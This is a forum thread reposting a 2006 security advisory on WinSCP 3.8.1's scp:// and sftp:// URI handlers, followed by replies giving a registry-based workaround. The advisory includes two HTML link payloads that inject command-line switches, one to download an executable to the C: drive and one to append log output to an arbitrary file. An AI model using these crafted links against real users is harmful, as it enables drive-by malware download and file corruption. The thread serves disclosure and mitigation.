Critical Security Alert in winscp => fixed in 3.8.2

Advertisement

girafon
Guest

Critical Security Alert in winscp => fixed in 3.8.2

Just for information :

From : Jelmer Kuperus <jkuperus at planet.nl>
Subject : WinSCP - URI Handler Command Switch Parsing
Date : 2006-06-11

Original Message

WinSCP - URI Handler Command Switch Parsing

About winscp :

WinSCP is an open source freeware SFTP client for Windows using SSH.
Legacy SCP protocol is also supported. Its main function is safe copying
of files between a local and a remote computer.

Versions affected :

It was tested on WinSCP 3.8.1 , previous versions may or may not be
affected

Description :

During a typical installation of winscp several URI handlers are
installed. (scp:// sftp://) It is possible to include additional command
line switches to be passed to winscp

Some of these switches may initiate a file transfer, sending a
specified file to an arbitrary ftp. or they may download executables to
a location on a pc where they would be executed. eg. the startup folder

If you create an html page with these contents

<a href="scp://user:password@host:22/%22%20/console%20/command%20%22lcd%
20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>

And click on the link it would automatically download malware.exe to a
c:\ (asuming the host is in the cache otherwise user interaction is
required)

clicking on

<a href="scp://jelmer@127.0.0.1:22/%22%20%22/log=c:%5csomefile%
22"log</a>

would append log output to c:\somefile possibly rendering the file
unusable in the process. Note that this also works when the host is not
in the cache

Vendor status :

Martin Prikryl was notified June 04, 2006, He will "think about a
solution"

Reply with quote

Advertisement

bollino
Guest

Hmm, just got this info via Heise News ...

Whats about just to disable that "several URI handlers"
scp:// and and sftp:// as workaround.

Indeed, I use WinSCP quite long and NEVER needed that.

bo*

Reply with quote

martin
Site Admin
martin avatar
Joined:
Posts:
40,476
Location:
Prague, Czechia

bollino wrote:

Whats about just to disable that "several URI handlers"
scp:// and and sftp:// as workaround.
Sure that would be workaround. You can de-register the handlers by importing following REG file and restarting (logoff/logon should be enough):

REGEDIT4

[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SCP]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SFTP]

[-HKEY_CURRENT_USER\Software\Classes\SCP]

[-HKEY_CURRENT_USER\Software\Classes\SFTP]

Reply with quote

Advertisement

You can post new topics in this forum